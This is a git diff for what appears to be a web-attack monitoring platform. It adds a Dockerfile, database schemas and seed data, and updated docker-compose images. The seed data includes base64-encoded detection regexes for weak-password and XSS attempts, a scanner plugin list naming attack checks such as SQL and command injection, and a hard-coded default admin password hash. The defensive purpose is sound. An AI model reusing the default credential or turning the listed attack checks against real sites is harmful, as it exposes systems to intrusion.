diff --git a/backend/workapi/Dockerfile b/backend/workapi/Dockerfile new file mode 100644 index 0000000..4ad3318 --- /dev/null +++ b/backend/workapi/Dockerfile @@ -0,0 +1,12 @@ +FROM openjdk:15.0.2-jdk-slim-buster + +ARG MODULE + +COPY *.jar /app.jar + +ENV JAVA_OPTS="" +ENV SERVER_PORT 8080 + +EXPOSE ${SERVER_PORT} + +ENTRYPOINT [ "sh", "-c", "java $JAVA_OPTS -Djava.security.egd=file:/dev/urandom -jar /app.jar" ] diff --git a/deploy/docker-compose/db/init.sql b/db/init.sql similarity index 90% rename from deploy/docker-compose/db/init.sql rename to db/init.sql index 063e381..95d8280 100644 --- a/deploy/docker-compose/db/init.sql +++ b/db/init.sql @@ -424,6 +424,19 @@ CREATE TABLE `w3_website_service` ( PRIMARY KEY (`id`,`website_types`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='站点管理.服务配置'; +-- ---------------------------- +-- Table structure for w3_webscan_base_config +-- ---------------------------- +DROP TABLE IF EXISTS `w3_webscan_base_config`; +CREATE TABLE `w3_webscan_base_config` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `webscan_config_string_info` text COMMENT '配置内容(字符串型)', + `webscan_config_type` tinyint(1) DEFAULT '0' COMMENT '配置类型,0:爬取深度,1:扫描并发数,2:扫描请求useragent,3:扫描插件,4:云翻译', + `webscan_config_int_info` int(11) DEFAULT '0' COMMENT '配置内容(数字型)', + `webscan_config_updatetime` datetime DEFAULT NULL COMMENT '配置创建/更新时间', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='web扫描设置'; + /** * 初始化数据 @@ -453,4 +466,13 @@ INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, ` INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (10, '弱口令探测', 2, 0, now(), NULL, 1, 1, 'KD9pKShwYXNzd29yZHxwYXNzfHBhc3N3ZHxwd2R8cGR8dXNlcnB3ZHx1c2VycGFzc3x1c2VycGFzc3dkfHVzZXJwYXNzd29yZHxwYXNzX3dvcmR8dXNlcl9wYXNzd29yZHx1c2VyX3Bhc3MpXD0oP2kpKGFkbWlufGFkbWluMTIzfGFkbWluMTIzNDU2fDEyMzQ1NnxhZG1pbjg4OHxhZG1pbjg4ODh8dGVzdHwxMjM0fDEyM3x0ZXN0MTIzKQ=='); INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (11, 'XSS跨站脚本攻击', 2, 0, now(), NULL, 1, 1, 'XDwoP2kpc2NyaXB0XD4oP2kpYWxlcnRcKCguKilcKVw8XC8oP2kpc2NyaXB0XD4='); +-- ---------------------------- +-- web漏洞扫描 +-- ---------------------------- +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (1, 'allowed_methods, backdoors, backup_directories, backup_files, captcha, code_injection, code_injection_php_input_wrapper, code_injection_timing, common_admin_interfaces, common_directories, common_files, cookie_set_for_parent_domain, credit_card, csrf, cvs_svn_users, directory_listing, emails, file_inclusion, form_upload, hsts, htaccess_limit, html_objects, http_only_cookies, http_put, insecure_client_access_policy, insecure_cookies, insecure_cors_policy, insecure_cross_domain_policy_access, insecure_cross_domain_policy_headers, interesting_responses, ldap_injection, localstart_asp, mixed_resource, no_sql_injection, no_sql_injection_differential, origin_spoof_access_restriction_bypass, os_cmd_injection, os_cmd_injection_timing, password_autocomplete, path_traversal, private_ip, response_splitting, rfi, session_fixation, source_code_disclosure, sql_injection, sql_injection_differential, sql_injection_timing, ssn, trainer, unencrypted_password_forms, unvalidated_redirect, unvalidated_redirect_dom, webdav, x_frame_options, xpath_injection, xss, xss_dom, xss_dom_script_context, xss_event, xss_path, xss_script_context, xss_tag, xst, xxe', 3, 0, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (2, NULL, 0, 4, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (3, NULL, 1, 10, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (4, 'Baiduspider+(+http://www.baidu.com/search/spider.htm)', 2, 0, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (5, NULL, 4, 0, now()); + SET FOREIGN_KEY_CHECKS = 1; diff --git a/db/w3a_soc.sql b/deploy/docker-compose-m1/db/init.sql similarity index 62% rename from db/w3a_soc.sql rename to deploy/docker-compose-m1/db/init.sql index 96c5e00..95d8280 100644 --- a/db/w3a_soc.sql +++ b/deploy/docker-compose-m1/db/init.sql @@ -86,10 +86,124 @@ CREATE TABLE `w3_alter_paramets` ( `alter_referer` text COMMENT '配置Referer', `alter_frequency` bigint(20) DEFAULT '0' COMMENT '访问频率', `alter_statistics_type` tinyint(1) DEFAULT '0' COMMENT '统计类型,0:巡检统计数据,1:报表处理数据', - `alter_time` tinyint(1) DEFAULT '1' COMMENT '时间类型,1:每分钟,2:每小时,3:每天,4:每周', + `alter_time` tinyint(1) DEFAULT '1' COMMENT '时间类型,1:每分钟,2:每小时', PRIMARY KEY (`alter_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='告警参数表'; +-- ---------------------------- +-- Table structure for w3_apps_website +-- ---------------------------- +DROP TABLE IF EXISTS `w3_apps_website`; +CREATE TABLE `w3_apps_website` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `apps_type` tinyint(1) NOT NULL COMMENT '关联的类型,0:关联Git,1:关联容器服务,2:关联云资产', + `apps_string_info` varchar(255) NOT NULL COMMENT '资产内容,字符串型', + `apps_number_info` bigint(20) NOT NULL COMMENT '资产内容,数字型', + `apps_website_id` bigint(20) NOT NULL COMMENT '关联站点的ID', + `apps_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `apps_createtime` datetime NOT NULL COMMENT '创建时间', + `apps_status` tinyint(1) DEFAULT '1' COMMENT '关联状态,0:取消,1:启用', + `apps_errormsg` varchar(255) DEFAULT NULL COMMENT '异常原因', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='应用和站点关联配置表'; + +-- ---------------------------- +-- Table structure for w3_clouds_assets +-- ---------------------------- +DROP TABLE IF EXISTS `w3_clouds_assets`; +CREATE TABLE `w3_clouds_assets` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `cloud_assets_id` varchar(32) DEFAULT NULL COMMENT '云资产实例ID', + `cloud_assets_zone` varchar(30) DEFAULT NULL COMMENT '云资产归属可用区', + `cloud_assets_regions` varchar(30) DEFAULT NULL COMMENT '云资产归属地区', + `cloud_assets_config` varchar(68) DEFAULT NULL COMMENT '云资产配置', + `cloud_assets_intranet_ip` varchar(13) DEFAULT NULL COMMENT '云资产内网IP', + `cloud_assets_public_ip` varchar(13) DEFAULT NULL COMMENT '云资产外网IP', + `cloud_assets_instance_name` varchar(58) DEFAULT NULL COMMENT '云资产实例别名', + `cloud_assets_fingerprint` varchar(255) DEFAULT NULL COMMENT '云资产指纹,如系统版本', + `cloud_assets_createtime` datetime DEFAULT NULL COMMENT '云资产创建时间', + `cloud_assets_expiredtime` datetime DEFAULT NULL COMMENT '云资产释放时间', + `cloud_assets_updatetime` datetime DEFAULT NULL COMMENT '云资产更新时间', + `cloud_assets_securitygroup_id` varchar(255) DEFAULT NULL COMMENT '云资产安全组ID', + `cloud_assets_status` tinyint(1) DEFAULT '1' COMMENT '云资产原生状态,0:停用,1:运行中', + `cloud_assets_security_status` tinyint(1) DEFAULT '0' COMMENT '云资产安全状态,0:待检查,1:相对安全,2:不安全', + `cloud_assets_types` tinyint(1) DEFAULT '0' COMMENT '云资产类型,0:云主机,1:域名,2:redis,3:mysql,4:MariaDB,5:SQLServer,6:MongoDB', + `cloud_assets_ports` varchar(6) DEFAULT '1' COMMENT '云资产端口号', + `cloud_assets_simple_name` varchar(255) DEFAULT '1' COMMENT '云资产通用字段', + `cloud_assets_delete` tinyint(1) DEFAULT '1' COMMENT '云资产删除,0:删除,1:正常', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='云资产数据'; + +-- ---------------------------- +-- Table structure for w3_clouds_secrets +-- ---------------------------- +DROP TABLE IF EXISTS `w3_clouds_secrets`; +CREATE TABLE `w3_clouds_secrets` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `cloud_secret_type` tinyint(1) NOT NULL COMMENT '云厂商类型,0:阿里云,1:腾讯云,2:华为云', + `cloud_access_key` varchar(255) NOT NULL COMMENT 'AccessKeyId', + `cloud_access_token` varchar(255) NOT NULL COMMENT 'AccessSecret', + `cloud_secret_status` tinyint(1) DEFAULT '1' COMMENT '状态,0:停用,1:启用', + `cloud_secret_delete` tinyint(1) DEFAULT '1' COMMENT '删除状态,0:删除,1:启用', + `cloud_secret_create_userid` bigint(20) NOT NULL COMMENT '创建的用户ID', + `cloud_secret_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `cloud_secret_createtime` datetime NOT NULL COMMENT '创建时间', + `cloud_secret_errormsg` varchar(255) DEFAULT NULL COMMENT '异常原因', + `cloud_secret_info` varchar(20) NOT NULL COMMENT '备注', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='云厂商配置'; + +-- ---------------------------- +-- Table structure for w3_gitlab_config +-- ---------------------------- +DROP TABLE IF EXISTS `w3_gitlab_config`; +CREATE TABLE `w3_gitlab_config` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `gitlab_config_addr` varchar(255) NOT NULL COMMENT 'gitlab/GITHUB主地址', + `gitlab_config_username` varchar(255) NOT NULL COMMENT '账号', + `gitlab_config_token` varchar(255) NOT NULL COMMENT 'token值', + `gitlab_config_password` varchar(255) DEFAULT '1' COMMENT '密码', + `gitlab_config_status` tinyint(1) DEFAULT '1' COMMENT '状态,0:停用,1:启用', + `gitlab_config_delete_status` tinyint(1) DEFAULT '1' COMMENT '删除状态,0:删除,1:启用', + `gitlab_create_userid` bigint(20) NOT NULL COMMENT '创建的用户ID', + `gitlab_config_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `gitlab_config_createtime` datetime NOT NULL COMMENT '创建时间', + `gitlab_config_errormsg` varchar(255) DEFAULT NULL COMMENT '异常原因', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='git配置'; + +-- ---------------------------- +-- Table structure for w3_kubernetes_assets +-- ---------------------------- +DROP TABLE IF EXISTS `w3_kubernetes_assets`; +CREATE TABLE `w3_kubernetes_assets` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `kubernetes_id` bigint(20) NOT NULL COMMENT '集群配置的ID', + `kubernetes_service_name` varchar(255) NOT NULL COMMENT '集群服务名称', + `kubernetes_namespace` varchar(255) NOT NULL COMMENT '集群namespace', + `kubernetes_tags` varchar(255) DEFAULT NULL COMMENT '集群服务的tags', + `kubernetes_service_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `kubernetes_service_createtime` datetime NOT NULL COMMENT '创建时间', + `kubernetes_service_delete` tinyint(1) DEFAULT '1' COMMENT '删除状态,0:删除,1:启用', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='K8S集群抓取的资产数据'; + +-- ---------------------------- +-- Table structure for w3_kubernetes_config +-- ---------------------------- +DROP TABLE IF EXISTS `w3_kubernetes_config`; +CREATE TABLE `w3_kubernetes_config` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `kubernetes_config_kub` varchar(255) DEFAULT '1' COMMENT 'kubeconfig配置', + `kubernetes_config_status` tinyint(1) DEFAULT '1' COMMENT '状态,0:停用,1:启用', + `kubernetes_config_delete_status` tinyint(1) DEFAULT '1' COMMENT '删除状态,0:删除,1:启用', + `kubernetes_config_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `kubernetes_config_createtime` datetime NOT NULL COMMENT '创建时间', + `kubernetes_create_userid` bigint(20) NOT NULL COMMENT '创建的用户ID', + `kubernetes_config_errormsg` varchar(255) DEFAULT NULL COMMENT '异常原因', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='kubernetes配置'; + -- ---------------------------- -- Table structure for w3_license -- ---------------------------- @@ -118,6 +232,23 @@ CREATE TABLE `w3_secrets` ( PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='授权秘钥管理'; +-- ---------------------------- +-- Table structure for w3_spider_config +-- ---------------------------- +DROP TABLE IF EXISTS `w3_spider_config`; +CREATE TABLE `w3_spider_config` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `spider_config` tinyint(1) DEFAULT '0' COMMENT '抓取类型,0:云上资产,1:K8S数据,2:Git数据', + `spider_crontab_type` tinyint(1) DEFAULT '0' COMMENT '抓取频率,0:每分钟,1:每小时,2:每天', + `spider_id` bigint(20) NOT NULL COMMENT '对应的ID', + `spider_status` tinyint(1) DEFAULT '1' COMMENT '抓取状态,0:删除,1:启用', + `spider_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `spider_createtime` datetime NOT NULL COMMENT '创建时间', + `spider_delete` tinyint(1) DEFAULT '1' COMMENT '删除状态,0:删除,1:启用', + `spider_create_userid` bigint(20) NOT NULL COMMENT '创建的用户ID', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='抓取配置表'; + -- ---------------------------- -- Table structure for w3_statistics -- ---------------------------- @@ -127,8 +258,9 @@ CREATE TABLE `w3_statistics` ( `statis_uptime` datetime DEFAULT NULL COMMENT '创建/更新时间', `statis_type` tinyint(1) DEFAULT '0' COMMENT '类型,0:审计日志数、1:识别攻击数、2:审计网络请求数,3:识别网络风险数', `statis_counts` bigint(20) DEFAULT '0' COMMENT '统计数', + `website_id` bigint(20) NOT NULL COMMENT '站点归属ID', PRIMARY KEY (`id`) -) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='数据统计表'; +) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COMMENT='数据统计表'; -- ---------------------------- -- Table structure for w3_users @@ -262,7 +394,7 @@ CREATE TABLE `w3_website` ( `website_updatetime` datetime DEFAULT NULL COMMENT '更新时间', `website_delete` tinyint(1) DEFAULT '1' COMMENT '逻辑删除,0:删除,1:可用', PRIMARY KEY (`id`) -) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='站点管理'; +) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='站点管理'; -- ---------------------------- -- Table structure for w3_website_config @@ -292,21 +424,33 @@ CREATE TABLE `w3_website_service` ( PRIMARY KEY (`id`,`website_types`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='站点管理.服务配置'; +-- ---------------------------- +-- Table structure for w3_webscan_base_config +-- ---------------------------- +DROP TABLE IF EXISTS `w3_webscan_base_config`; +CREATE TABLE `w3_webscan_base_config` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `webscan_config_string_info` text COMMENT '配置内容(字符串型)', + `webscan_config_type` tinyint(1) DEFAULT '0' COMMENT '配置类型,0:爬取深度,1:扫描并发数,2:扫描请求useragent,3:扫描插件,4:云翻译', + `webscan_config_int_info` int(11) DEFAULT '0' COMMENT '配置内容(数字型)', + `webscan_config_updatetime` datetime DEFAULT NULL COMMENT '配置创建/更新时间', + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='web扫描设置'; + + /** * 初始化数据 */ -- ---------------------------- --- 创建测试账号密码 +-- License管理(默认都是社区版) -- ---------------------------- -INSERT INTO `w3a_soc`.`w3_users`(`user_name`,`user_password`,`user_createtime`)VALUES('admin','385ba8ba360a0efbf17c93784323f655', now()); +INSERT INTO `w3a_soc`.`w3_license`(`id`, `license_type`, `lincese_info`) VALUES (1, 1, '社区版'); +INSERT INTO `w3a_soc`.`w3_license`(`id`, `license_type`, `lincese_info`) VALUES (2, 2, '无'); -- ---------------------------- +-- 创建测试账号密码 -- ---------------------------- --- 创建统计数据 +INSERT INTO `w3a_soc`.`w3_users`(`user_name`,`user_password`,`user_createtime`)VALUES('admin','385ba8ba360a0efbf17c93784323f655', now()); -- ---------------------------- -INSERT INTO `w3a_soc`.`w3_statistics`(`id`, `statis_uptime`, `statis_type`, `statis_counts`) VALUES (1, NULL, 0, 0); -INSERT INTO `w3a_soc`.`w3_statistics`(`id`, `statis_uptime`, `statis_type`, `statis_counts`) VALUES (2, NULL, 1, 0); -INSERT INTO `w3a_soc`.`w3_statistics`(`id`, `statis_uptime`, `statis_type`, `statis_counts`) VALUES (3, NULL, 2, 0); -INSERT INTO `w3a_soc`.`w3_statistics`(`id`, `statis_uptime`, `statis_type`, `statis_counts`) VALUES (4, NULL, 3, 0); -- ---------------------------- -- 创建测试规则数据 -- ---------------------------- @@ -322,4 +466,13 @@ INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, ` INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (10, '弱口令探测', 2, 0, now(), NULL, 1, 1, 'KD9pKShwYXNzd29yZHxwYXNzfHBhc3N3ZHxwd2R8cGR8dXNlcnB3ZHx1c2VycGFzc3x1c2VycGFzc3dkfHVzZXJwYXNzd29yZHxwYXNzX3dvcmR8dXNlcl9wYXNzd29yZHx1c2VyX3Bhc3MpXD0oP2kpKGFkbWlufGFkbWluMTIzfGFkbWluMTIzNDU2fDEyMzQ1NnxhZG1pbjg4OHxhZG1pbjg4ODh8dGVzdHwxMjM0fDEyM3x0ZXN0MTIzKQ=='); INSERT INTO `w3a_soc`.`w3_web_attack_rules`(`id`, `rules_name`, `rules_level`, `rules_trigger_count`, `rules_createtime`, `rules_updatetime`, `rules_status`, `rules_delete`, `rules_regex`) VALUES (11, 'XSS跨站脚本攻击', 2, 0, now(), NULL, 1, 1, 'XDwoP2kpc2NyaXB0XD4oP2kpYWxlcnRcKCguKilcKVw8XC8oP2kpc2NyaXB0XD4='); +-- ---------------------------- +-- web漏洞扫描 +-- ---------------------------- +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (1, 'allowed_methods, backdoors, backup_directories, backup_files, captcha, code_injection, code_injection_php_input_wrapper, code_injection_timing, common_admin_interfaces, common_directories, common_files, cookie_set_for_parent_domain, credit_card, csrf, cvs_svn_users, directory_listing, emails, file_inclusion, form_upload, hsts, htaccess_limit, html_objects, http_only_cookies, http_put, insecure_client_access_policy, insecure_cookies, insecure_cors_policy, insecure_cross_domain_policy_access, insecure_cross_domain_policy_headers, interesting_responses, ldap_injection, localstart_asp, mixed_resource, no_sql_injection, no_sql_injection_differential, origin_spoof_access_restriction_bypass, os_cmd_injection, os_cmd_injection_timing, password_autocomplete, path_traversal, private_ip, response_splitting, rfi, session_fixation, source_code_disclosure, sql_injection, sql_injection_differential, sql_injection_timing, ssn, trainer, unencrypted_password_forms, unvalidated_redirect, unvalidated_redirect_dom, webdav, x_frame_options, xpath_injection, xss, xss_dom, xss_dom_script_context, xss_event, xss_path, xss_script_context, xss_tag, xst, xxe', 3, 0, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (2, NULL, 0, 4, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (3, NULL, 1, 10, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (4, 'Baiduspider+(+http://www.baidu.com/search/spider.htm)', 2, 0, now()); +INSERT INTO `w3a_soc`.`w3_webscan_base_config`(`id`, `webscan_config_string_info`, `webscan_config_type`, `webscan_config_int_info`, `webscan_config_updatetime`) VALUES (5, NULL, 4, 0, now()); + SET FOREIGN_KEY_CHECKS = 1; diff --git a/deploy/docker-compose/docker-compose.yml b/deploy/docker-compose-m1/docker-compose.yml similarity index 97% rename from deploy/docker-compose/docker-compose.yml rename to deploy/docker-compose-m1/docker-compose.yml index bab4d76..faf6d2e 100644 --- a/deploy/docker-compose/docker-compose.yml +++ b/deploy/docker-compose-m1/docker-compose.yml @@ -81,7 +81,7 @@ services: # 分析端 w3aAnalysisAgent: - image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-agent:v1.0.10 + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-agent:v1.0.11 environment: - topic=weblogs - kafka=kafka:9092 @@ -90,7 +90,7 @@ services: # 告警端 w3aAlterAgent: - image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-agent:v1.0.10 + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-agent:v1.0.11 environment: - topic=weblogs - kafka=kafka:9092 @@ -99,14 +99,14 @@ services: # 资产采集端 w3aAssetsAgent: - image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-agent:v1.0.10 + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-agent:v1.0.11 environment: - openapi=w3aworkapi:8080 - modes=assets # Web前端 w3aFrotend: - image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-frontend:v1.0.10 + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-frontend:v1.0.11 ports: - '81:80' depends_on: @@ -114,7 +114,7 @@ services: # 平台侧 w3aDashboard: - image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-dashboard:v1.0.10 + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-dashboard:v1.0.11 ports: - '8081:8080' environment: @@ -135,7 +135,7 @@ services: # workAPI w3aworkapi: - image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-workapi:v1.0.10 + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-workapi:v1.0.11 ports: - '8082:8080' environment: @@ -153,7 +153,7 @@ services: # openAPI w3aopenapi: - image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-openapi:v1.0.10 + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-openapi:v1.0.11 ports: - '8083:8080' environment: diff --git a/deploy/docker-compose/filebeat-kafka.yml b/deploy/docker-compose-m1/filebeat-kafka.yml similarity index 100% rename from deploy/docker-compose/filebeat-kafka.yml rename to deploy/docker-compose-m1/filebeat-kafka.yml diff --git a/deploy/docker-compose/filebeat-nginx.yml b/deploy/docker-compose-m1/filebeat-nginx.yml similarity index 100% rename from deploy/docker-compose/filebeat-nginx.yml rename to deploy/docker-compose-m1/filebeat-nginx.yml diff --git a/deploy/docker-compose/nginx.conf b/deploy/docker-compose-m1/nginx.conf similarity index 100% rename from deploy/docker-compose/nginx.conf rename to deploy/docker-compose-m1/nginx.conf diff --git a/deploy/docker-compose/web/log/access.log b/deploy/docker-compose-m1/web/log/access.log similarity index 100% rename from deploy/docker-compose/web/log/access.log rename to deploy/docker-compose-m1/web/log/access.log diff --git a/deploy/docker-compose-m1/web/log/error.log b/deploy/docker-compose-m1/web/log/error.log new file mode 100644 index 0000000..e69de29 diff --git a/deploy/docker-compose-x86_64/db/init.sql b/deploy/docker-compose-x86_64/db/init.sql new file mode 100644 index 0000000..95d8280 --- /dev/null +++ b/deploy/docker-compose-x86_64/db/init.sql @@ -0,0 +1,478 @@ +CREATE DATABASE w3a_soc; +USE w3a_soc; +/* + Navicat MySQL Data Transfer + + Source Server Type : MariaDB + Source Server Version : 50568 + Source Schema : w3a_soc + + Target Server Type : MariaDB + Target Server Version : 50568 + File Encoding : 65001 + + Date: 13/05/2022 02:38:41 +*/ + +SET NAMES utf8mb4; +SET FOREIGN_KEY_CHECKS = 0; + +-- ---------------------------- +-- Table structure for w3_alter_channel +-- ---------------------------- +DROP TABLE IF EXISTS `w3_alter_channel`; +CREATE TABLE `w3_alter_channel` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `alter_id` bigint(20) NOT NULL COMMENT 'id', + `alter_source_id` bigint(20) NOT NULL COMMENT '告警渠道id', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8 COMMENT='告警渠道表'; + +-- ---------------------------- +-- Table structure for w3_alter_config +-- ---------------------------- +DROP TABLE IF EXISTS `w3_alter_config`; +CREATE TABLE `w3_alter_config` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `alter_source_createtime` datetime NOT NULL COMMENT '创建时间', + `alter_source_name` varchar(50) NOT NULL COMMENT '告警源名称', + `alter_source_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `alter_source_type` tinyint(1) DEFAULT '0' COMMENT '告警源,0:企业微信、1:钉钉、2:邮件', + `alter_config_status` tinyint(1) DEFAULT '0' COMMENT '配置状态,0:启用、1:不启用', + `alter_config_email_username` varchar(255) DEFAULT '' COMMENT '邮箱账号', + `alter_config_email_password` varchar(255) DEFAULT '' COMMENT '邮箱密码', + `alter_config_token` varchar(255) DEFAULT '' COMMENT '企业微信、钉钉的TOKEN', + `alter_config_delete` tinyint(1) DEFAULT '1' COMMENT '逻辑删除,0:已删除,1:启用', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='告警配置表'; + +-- ---------------------------- +-- Table structure for w3_alter_logs +-- ---------------------------- +DROP TABLE IF EXISTS `w3_alter_logs`; +CREATE TABLE `w3_alter_logs` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `alter_id` bigint(20) NOT NULL COMMENT '规则id', + `alter_createtime` datetime NOT NULL COMMENT '创建时间', + `alter_info` longtext NOT NULL COMMENT '告警内容', + PRIMARY KEY (`id`) +) ENGINE=InnoDB AUTO_INCREMENT=59 DEFAULT CHARSET=utf8 COMMENT='告警记录表'; + +-- ---------------------------- +-- Table structure for w3_alter_master +-- ---------------------------- +DROP TABLE IF EXISTS `w3_alter_master`; +CREATE TABLE `w3_alter_master` ( + `alter_id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `alter_name` text NOT NULL COMMENT '告警内容', + `alter_scenes` tinyint(1) DEFAULT '1' COMMENT '场景:1:攻击流量场景观测,2:统计报表场景', + `alter_trigger` bigint(20) DEFAULT '0' COMMENT '告警触发', + `alter_createtime` datetime NOT NULL COMMENT '创建时间', + `alter_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + `alter_status` tinyint(1) DEFAULT '1' COMMENT '告警状态,0:关闭,1:开启', + `alter_delete` tinyint(1) DEFAULT '1' COMMENT '告警状态,0:删除,1:启用', + PRIMARY KEY (`alter_id`) +) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='告警主表'; + +-- ---------------------------- +-- Table structure for w3_alter_paramets +-- ---------------------------- +DROP TABLE IF EXISTS `w3_alter_paramets`; +CREATE TABLE `w3_alter_paramets` ( + `alter_id` bigint(20) NOT NULL COMMENT 'id', + `alter_url` text COMMENT '配置URL内容', + `alter_useragent` text COMMENT '配置USERAGENT', + `alter_ipaddr` text COMMENT '配置IP地址', + `alter_referer` text COMMENT '配置Referer', + `alter_frequency` bigint(20) DEFAULT '0' COMMENT '访问频率', + `alter_statistics_type` tinyint(1) DEFAULT '0' COMMENT '统计类型,0:巡检统计数据,1:报表处理数据', + `alter_time` tinyint(1) DEFAULT '1' COMMENT '时间类型,1:每分钟,2:每小时', + PRIMARY KEY (`alter_id`) +) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='告警参数表'; + +-- ---------------------------- +-- Table structure for w3_apps_website +-- ---------------------------- +DROP TABLE IF EXISTS `w3_apps_website`; +CREATE TABLE `w3_apps_website` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'id', + `apps_type` tinyint(1) NOT NULL COMMENT '关联的类型,0:关联Git,1:关联容器服务,2:关联云资产', + `apps_string_info` varchar(255) NOT NULL COMMENT '资产内容,字符串型', + `apps_number_info` bigint(20) NOT NULL COMMENT '资产内容,数字型', + `apps_website_id` bigint(20) NOT NULL COMMENT '关联站点的ID', + `apps_updatetime` datetime DEFAULT NULL COMMENT '更新时间', + 